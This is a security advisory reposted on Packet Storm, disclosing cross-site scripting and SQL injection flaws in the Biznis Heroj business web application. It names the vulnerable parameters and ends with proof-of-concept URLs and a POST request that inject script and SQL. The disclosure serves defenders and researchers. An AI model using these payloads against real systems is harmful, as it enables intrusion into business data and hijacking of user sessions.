what you don't know can hurt you

Infoproject Biznis Heroj Cross Site Scripting / SQL Injection

Infoproject Biznis Heroj Cross Site Scripting / SQL Injection
Posted Dec 21, 2011
Authored by LiquidWorm | Site zeroscience.mk

Infoproject Biznis Heroj versions Plus, Pro and Extra all suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 5e7d3cbc7a4cebc3d81c2a5815a583e2

Infoproject Biznis Heroj Cross Site Scripting / SQL Injection

Change Mirror Download

Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities


Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra

Summary: Biznis Heroj or Business Hero (Áèçíèñ Õåðî¼) is the first
software on the Macedonian market that will help you manage your
business processes in your company, such as accounting, production,
acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.

Desc: Input passed via the parameters 'filter' in 'widget.dokumenti_lista.php'
and 'fin_nalog_id' in 'nalozi_naslov.php' script are not properly sanitised
before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. The param 'config'
in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to a XSS
issue where the attacker can execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

Tested on: Apache, PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com


Vendor status:

[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.


Advisory ID: ZSL-2011-5064
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php


14.12.2011

---


XSS:

https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1);
https://[TARGET]/widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1


SQLi:

- POST https://[TARGET]/widgets/widget.dokumenti_lista.php

action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen&
bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1&
magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML&
dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML&
dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML&
dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA&
order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc &
filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=&
limit=50&widget=1


- GET https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close